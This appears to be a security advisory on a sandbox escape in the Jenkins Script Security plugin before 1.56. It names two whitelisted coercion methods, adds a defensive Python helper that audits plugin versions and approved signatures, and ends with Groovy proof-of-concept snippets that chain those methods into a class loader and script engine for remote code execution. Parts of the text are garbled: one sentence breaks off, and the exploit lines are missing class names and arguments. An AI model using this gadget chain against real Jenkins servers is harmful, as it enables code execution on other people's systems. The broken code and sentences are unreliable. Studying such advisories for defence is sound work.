The Jenkins Script Security plugin prior to version 1.56 was vulnerable to code execution due to a sandbox escape. The plugin whitelisted two static methods in the default configuration. Both methods allowed type coercion between arbitrary objects and classes. For example, a java.lang.String could be coerced into a The vulnerable methods searched for a relevant constructor and automatically called it before attempting the cast. This pattern can be used to build a gadget chain and gain remote code execution.

Vulnerable methods:

staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter castToType java.lang.Object java.lang.Class
staticMethod org.kohsuke.groovy.sandbox.impl.Checker checkedCast java.lang.Class java.lang.Object boolean boolean boolean
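The following audit helper is an added example, not part of the original advisory or the Jenkins project. It checks two things a defender cares about here: whether an installed Script Security plugin version is older than the fixed release 1.56, and whether either of the two signatures listed above appears among explicitly approved signatures in a constructed sample of scriptApproval.xml. The element layout (a root element carrying a plugin="script-security@<version>" attribute, with approvedSignatures and aclApprovedSignatures holding <string> children) is assumed from the plugin's XStream serialisation and should be compared against a real instance before relying on it.

```python
"""Audit helper (added example; not the advisory's or Jenkins' own code).

Flags approved Script Security signatures matching the two vulnerable
type-coercion methods and checks whether a plugin version predates 1.56.
"""
import re
import xml.etree.ElementTree as ET

# The two signatures from the advisory, spelled exactly as Script Security does.
VULNERABLE_SIGNATURES = {
    "staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter castToType "
    "java.lang.Object java.lang.Class",
    "staticMethod org.kohsuke.groovy.sandbox.impl.Checker checkedCast "
    "java.lang.Class java.lang.Object boolean boolean boolean",
}

# First release without the vulnerable whitelist entries.
FIXED_VERSION = (1, 56)

# Constructed sample of $JENKINS_HOME/scriptApproval.xml (assumed layout;
# the version attribute and element names mirror the plugin's XStream output).
SAMPLE_SCRIPT_APPROVAL = """<scriptApproval plugin="script-security@1.53">
  <approvedScriptHashes/>
  <approvedSignatures>
    <string>method java.lang.String length</string>
    <string>staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter castToType java.lang.Object java.lang.Class</string>
  </approvedSignatures>
  <aclApprovedSignatures/>
</scriptApproval>
"""


def parse_version(text):
    """Turn '1.53' or '1.56.1' into a tuple of ints that compares naturally."""
    return tuple(int(p) for p in re.findall(r"\d+", text))


def is_vulnerable_version(version_text):
    """True when the plugin version is strictly older than the fixed release."""
    return parse_version(version_text) < FIXED_VERSION


def plugin_version_from_xml(xml_text):
    """Read the version from the root element's plugin="name@version" attribute."""
    root = ET.fromstring(xml_text)
    attr = root.get("plugin", "")
    return attr.split("@", 1)[1] if "@" in attr else None


def flag_vulnerable_signatures(xml_text):
    """Return every approved signature that matches a vulnerable method."""
    root = ET.fromstring(xml_text)
    flagged = []
    for container in ("approvedSignatures", "aclApprovedSignatures"):
        node = root.find(container)
        if node is None:
            continue
        for entry in node.findall("string"):
            text = (entry.text or "").strip()
            if text in VULNERABLE_SIGNATURES:
                flagged.append(text)
    return flagged


def audit(xml_text):
    """Combine the version check and the signature scan into one report."""
    version = plugin_version_from_xml(xml_text)
    return {
        "version": version,
        "vulnerable_version": bool(version) and is_vulnerable_version(version),
        "flagged": flag_vulnerable_signatures(xml_text),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_SCRIPT_APPROVAL)
    print("plugin version:", report["version"])
    print("older than 1.56:", report["vulnerable_version"])
    for sig in report["flagged"]:
        print("vulnerable signature approved:", sig)
```

A version older than 1.56 is already a finding on its own, because these entries were in the plugin's built-in whitelist and do not need to appear in scriptApproval.xml; the signature scan additionally catches an administrator who re-approved them by hand after upgrading.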


import org.codehaus.groovy.runtime.ScriptBytecodeAdapter
def url    = [""] as
def loader = ScriptBytecodeAdapter.castToType([url],
def engine = ScriptBytecodeAdapter.castToType([loader], javax.script.ScriptEngineManager)

import org.kohsuke.groovy.sandbox.impl.Checker
def url    = [""] as
def loader = Checker.checkedCast(, [url], true, false, false)
def engine = Checker.checkedCast(javax.script.ScriptEngineManager, [loader], true, false, false)